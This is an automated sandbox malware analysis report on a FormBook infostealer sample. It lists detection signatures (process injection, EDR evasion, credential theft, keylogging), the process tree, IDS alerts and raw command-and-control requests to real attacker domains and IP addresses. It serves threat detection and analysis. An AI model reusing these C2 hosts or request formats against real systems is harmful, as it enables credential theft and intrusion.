Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BLv4mI7zzY.exe

Overview

General Information

Sample name:BLv4mI7zzY.exe
renamed because original name is a hash value
Original sample name:54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5.exe
Analysis ID:1588799
MD5:b6a92ee2ba34b81fa9484072b4d20072
SHA1:0726cc609fcd36cdf9634faacce3d77d16c9129b
SHA256:54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BLv4mI7zzY.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\BLv4mI7zzY.exe" MD5: B6A92EE2BA34B81FA9484072B4D20072)
    • svchost.exe (PID: 4900 cmdline: "C:\Users\user\Desktop\BLv4mI7zzY.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XNNdkVYUhBbatb.exe (PID: 3880 cmdline: "C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp_isv.exe (PID: 5156 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe" MD5: E7516E154D7AEE0ECD4BF892C3BC33C2)
          • firefox.exe (PID: 2276 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ParentImage: C:\Users\user\Desktop\BLv4mI7zzY.exe, ParentProcessId: 6568, ParentProcessName: BLv4mI7zzY.exe, ProcessCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ProcessId: 4900, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ParentImage: C:\Users\user\Desktop\BLv4mI7zzY.exe, ParentProcessId: 6568, ParentProcessName: BLv4mI7zzY.exe, ProcessCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ProcessId: 4900, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:39:48.471913+010020507451Malware Command and Control Activity Detected192.168.2.653765162.218.30.23580TCP
                2025-01-11T05:40:21.142542+010020507451Malware Command and Control Activity Detected192.168.2.65377013.228.81.3980TCP
                2025-01-11T05:40:42.945271+010020507451Malware Command and Control Activity Detected192.168.2.653775209.74.79.4080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:39:48.471913+010028554651A Network Trojan was detected192.168.2.653765162.218.30.23580TCP
                2025-01-11T05:40:21.142542+010028554651A Network Trojan was detected192.168.2.65377013.228.81.3980TCP
                2025-01-11T05:40:42.945271+010028554651A Network Trojan was detected192.168.2.653775209.74.79.4080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:40:13.477922+010028554641A Network Trojan was detected192.168.2.65376713.228.81.3980TCP
                2025-01-11T05:40:16.043618+010028554641A Network Trojan was detected192.168.2.65376813.228.81.3980TCP
                2025-01-11T05:40:18.584119+010028554641A Network Trojan was detected192.168.2.65376913.228.81.3980TCP
                2025-01-11T05:40:35.162238+010028554641A Network Trojan was detected192.168.2.653771209.74.79.4080TCP
                2025-01-11T05:40:37.704071+010028554641A Network Trojan was detected192.168.2.653772209.74.79.4080TCP
                2025-01-11T05:40:40.244395+010028554641A Network Trojan was detected192.168.2.653774209.74.79.4080TCP
                2025-01-11T05:40:50.123152+010028554641A Network Trojan was detected192.168.2.65377647.254.140.25580TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: BLv4mI7zzY.exeVirustotal: Detection: 56%Perma Link
                Source: BLv4mI7zzY.exeReversingLabs: Detection: 63%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: BLv4mI7zzY.exeJoe Sandbox ML: detected
                Source: BLv4mI7zzY.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541536503.000000000036E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdb source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdbGCTL source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0049445A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049C6D1 FindFirstFileW,FindClose,0_2_0049C6D1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0049C75C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049EF95
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049F0F2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0049F3F3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004937EF
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00493B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00493B12
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0049BCBC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0061C400 FindFirstFileW,FindNextFileW,FindClose,6_2_0061C400
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 4x nop then pop edi5_2_027E7925
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 4x nop then xor eax, eax5_2_027EB7F9
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 4x nop then pop edi5_2_027E5F88
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 4x nop then pop edi5_2_027E6C47
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 4x nop then xor eax, eax6_2_00609DC0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 4x nop then mov ebx, 00000004h6_2_02C904E5

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:53765 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53765 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53768 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53774 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53767 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:53775 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53775 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53769 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53772 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:53770 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53770 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53776 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53771 -> 209.74.79.40:80
                Source: DNS query: www.l54354.xyz
                Source: global trafficTCP traffic: 192.168.2.6:53574 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 209.74.79.40 209.74.79.40
                Source: Joe Sandbox ViewIP Address: 13.228.81.39 13.228.81.39
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: ANT-CLOUDUS ANT-CLOUDUS
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004A22EE
                Source: global trafficHTTP traffic detected: GET /jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.l54354.xyzConnection: closeUser-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                Source: global trafficHTTP traffic detected: GET /iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sharefree88k24.clickConnection: closeUser-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                Source: global trafficHTTP traffic detected: GET /bq63/?yL=ohjXjzZp0vl4&pLNPctn=JMKUEBcn+eAmAFujaEF1qxeVIjz6+zqaFMGoHelGSQfwy8OfYyWy6eToJbov20XPgBo7nj3xQKoGJ28WWnvYSwxzVh5Y8omsVuJaqqj7jyf3zIW+vgojp3i5Cusjdn8f20Ku4TQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.shopphere.storeConnection: closeUser-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.l54354.xyz
                Source: global trafficDNS traffic detected: DNS query: www.valdevez.net
                Source: global trafficDNS traffic detected: DNS query: www.sharefree88k24.click
                Source: global trafficDNS traffic detected: DNS query: www.tizzles.tech
                Source: global trafficDNS traffic detected: DNS query: www.shopphere.store
                Source: global trafficDNS traffic detected: DNS query: www.odvfr.info
                Source: unknownHTTP traffic detected: POST /iz19/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.sharefree88k24.clickConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 212Cache-Control: max-age=0Origin: http://www.sharefree88k24.clickReferer: http://www.sharefree88k24.click/iz19/User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)Data Raw: 70 4c 4e 50 63 74 6e 3d 5a 75 45 6c 74 30 59 72 7a 43 43 69 6b 77 4a 42 59 6e 30 61 50 35 77 6b 54 70 36 39 76 67 4e 53 4a 53 59 65 72 7a 6e 53 62 41 6e 2b 4b 73 34 49 6c 4d 73 44 74 72 30 41 54 44 78 66 65 38 57 50 76 6a 69 33 46 30 61 4c 69 6b 42 78 67 72 4f 69 6e 61 37 6f 78 6a 64 50 51 37 6e 33 45 74 67 51 61 32 61 63 2f 78 51 65 38 79 53 69 59 75 52 4c 76 56 31 49 64 58 65 34 34 32 53 68 53 70 54 66 31 53 41 32 51 72 64 70 63 4e 42 78 44 6f 66 6a 47 77 2b 46 45 58 64 79 49 35 63 68 4f 63 38 74 46 46 75 6a 4a 48 71 68 35 62 63 48 6f 57 65 55 74 33 61 55 39 30 4c 47 34 50 56 4f 30 54 52 7a 2f 66 2f 6c 76 39 68 4b 4b 65 43 4a Data Ascii: pLNPctn=ZuElt0YrzCCikwJBYn0aP5wkTp69vgNSJSYerznSbAn+Ks4IlMsDtr0ATDxfe8WPvji3F0aLikBxgrOina7oxjdPQ7n3EtgQa2ac/xQe8ySiYuRLvV1IdXe442ShSpTf1SA2QrdpcNBxDofjGw+FEXdyI5chOc8tFFujJHqh5bcHoWeUt3aU90LG4PVO0TRz/f/lv9hKKeCJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:40:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
